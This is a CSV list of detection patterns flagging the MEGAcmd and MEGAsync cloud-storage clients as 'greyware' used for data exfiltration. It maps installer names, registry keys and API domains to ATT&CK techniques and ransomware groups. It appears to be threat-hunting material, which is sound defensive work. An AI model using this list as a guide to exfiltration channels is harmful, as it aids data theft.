"*linux@mega.co.nz*",".{0,1000}linux\@mega\.co\.nz.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#email","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*MEGA/MEGAcmdUpdaterTask*",".{0,1000}MEGA\/MEGAcmdUpdaterTask.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#useragent","https://github.com/meganz/MEGAcmd/blob/d0a1e8e2c7d70fd951ef47d2d92243a65f0bb6eb/src/updater/Preferences.h#L6","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*MEGAcmd/* MegaClient/*",".{0,1000}MEGAcmd\/.{0,1000}\sMegaClient\/.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#useragent","https://github.com/meganz/MEGAcmd/blob/d0a1e8e2c7d70fd951ef47d2d92243a65f0bb6eb/UserGuide.md?plain=1#L374","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*pacman -U *megacmd*",".{0,1000}pacman\s\-U\s.{0,1000}megacmd.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive 
and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*subprocess.Popen(MEGACMDSHELL*",".{0,1000}subprocess\.Popen\(MEGACMDSHELL.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "* megasync.exe*",".{0,1000}\smegasync\.exe.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* MEGAsyncSetup32.exe*",".{0,1000}\sMEGAsyncSetup32\.exe.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* MEGAsyncSetup64.exe*",".{0,1000}\sMEGAsyncSetup64\.exe.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup 
your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*.api.mega.co.nz*",".{0,1000}\.api\.mega\.co\.nz.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*.static.mega.co.nz*",".{0,1000}\.static\.mega\.co\.nz.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/megasync.exe*",".{0,1000}\/megasync\.exe.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/MEGAsyncSetup32.exe*",".{0,1000}\/MEGAsyncSetup32\.exe.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom 
- EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/MEGAsyncSetup64.exe*",".{0,1000}\/MEGAsyncSetup64\.exe.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*[megaapi_impl.cpp:*",".{0,1000}\[megaapi_impl\.cpp\:.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*[megaclient.cpp:*",".{0,1000}\[megaclient\.cpp\:.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\appdata\local\megasync\*",".{0,1000}\\appdata\\local\\megasync\\.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ContextMenuHandlers\MEGA (Context 
menu)*",".{0,1000}\\ContextMenuHandlers\\MEGA\s\(Context\smenu\).{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*\CurrentVersion\App Paths\MEGAsync*",".{0,1000}\\CurrentVersion\\App\sPaths\\MEGAsync.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*\CurrentVersion\Uninstall\MEGAsync*",".{0,1000}\\CurrentVersion\\Uninstall\\MEGAsync.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*\MEGA Website.lnk*",".{0,1000}\\MEGA\sWebsite\.lnk.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\MEGA 
Website.url*",".{0,1000}\\MEGA\sWebsite\.url.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\megaclient_statecache*.db*",".{0,1000}\\megaclient_statecache.{0,1000}\.db.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\megaclient_syncconfig_*",".{0,1000}\\megaclient_syncconfig_.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\megalimited-megasync_*",".{0,1000}\\megalimited\-megasync_.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\MEGAprivacyMEGAsync*",".{0,1000}\\MEGAprivacyMEGAsync.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - 
T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","named pipe","10","10","N/A","N/A","N/A","N/A" "*\MEGAsync.cfg*",".{0,1000}\\MEGAsync\.cfg.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\megasync.exe*",".{0,1000}\\megasync\.exe.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\MEGAsync.lnk*",".{0,1000}\\MEGAsync\.lnk.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\megasync.lock*",".{0,1000}\\megasync\.lock.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data 
Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\MEGAsync.log*",".{0,1000}\\MEGAsync\.log.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\megasync.version*",".{0,1000}\\megasync\.version.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\MEGAsyncSetup32.exe*",".{0,1000}\\MEGAsyncSetup32\.exe.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\MEGAsyncSetup64.exe*",".{0,1000}\\MEGAsyncSetup64\.exe.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*\MEGAupdater.exe*",".{0,1000}\\MEGAupdater\.exe.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ProgramData\megatmp.M1.txt*",".{0,1000}\\ProgramData\\megatmp\.M1\.txt.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ProgramData\megatmp.M2.txt*",".{0,1000}\\ProgramData\\megatmp\.M2\.txt.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ShellIconOverlayIdentifiers\_ MEGA (Pending)*",".{0,1000}\\ShellIconOverlayIdentifiers\\_\sMEGA\s\(Pending\).{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*\ShellIconOverlayIdentifiers\_ MEGA 
(Synced)*",".{0,1000}\\ShellIconOverlayIdentifiers\\_\sMEGA\s\(Synced\).{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*\ShellIconOverlayIdentifiers\_ MEGA (Syncing)*",".{0,1000}\\ShellIconOverlayIdentifiers\\_\sMEGA\s\(Syncing\).{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*\Start Menu\Programs\MEGAsync\*",".{0,1000}\\Start\sMenu\\Programs\\MEGAsync\\.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\StartupTNotiMEGAsync.lnk*",".{0,1000}\\StartupTNotiMEGAsync\.lnk.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*'Company'>Mega 
Limited*",".{0,1000}\'Company\'\>Mega\sLimited\<\/Data\>.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*https://mega.nz/linux/repo/*",".{0,1000}https\:\/\/mega\.nz\/linux\/repo\/.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*MEGAsync Update Task*",".{0,1000}MEGAsync\sUpdate\sTask.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*MEGAsync.exe /*",".{0,1000}MEGAsync\.exe\s\/.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*MEGASYNC.EXE-*.pf*",".{0,1000}MEGASYNC\.EXE\-.{0,1000}\.pf.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 
- T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*MEGAsync\ShellExtX64.dll*",".{0,1000}MEGAsync\\ShellExtX64\.dll.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*megasync-CentOS_*.x86_64.rpm*",".{0,1000}megasync\-CentOS_.{0,1000}\.x86_64\.rpm.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*megasync-CentOS_*.x86_64.rpm*",".{0,1000}megasync\-CentOS_.{0,1000}\.x86_64\.rpm.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*megasync-Debian_*_amd64.deb*",".{0,1000}megasync\-Debian_.{0,1000}_amd64\.deb.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* 
- LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*megasync-Fedora_*.x86_64.rpm*",".{0,1000}megasync\-Fedora_.{0,1000}\.x86_64\.rpm.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*megasync-openSUSE_Leap_*.x86_64.rpm*",".{0,1000}megasync\-openSUSE_Leap_.{0,1000}\.x86_64\.rpm.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*megasync-Raspbian_*_armhf.deb*",".{0,1000}megasync\-Raspbian_.{0,1000}_armhf\.deb.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*MEGAsyncSetup32_*_RC3.exe*",".{0,1000}MEGAsyncSetup32_.{0,1000}_RC3\.exe.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* 
- Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*MEGASYNCSETUP64.EXE-*.pf*",".{0,1000}MEGASYNCSETUP64\.EXE\-.{0,1000}\.pf.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*MEGAsyncSetup64_*_RC3.exe*",".{0,1000}MEGAsyncSetup64_.{0,1000}_RC3\.exe.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*MEGAsyncSetupArm64.dmg*",".{0,1000}MEGAsyncSetupArm64\.dmg.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*megasync-x86_64.pkg*",".{0,1000}megasync\-x86_64\.pkg.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
